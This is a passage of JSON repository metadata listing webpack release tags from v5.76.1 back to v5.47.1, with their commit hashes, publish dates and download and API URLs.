10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":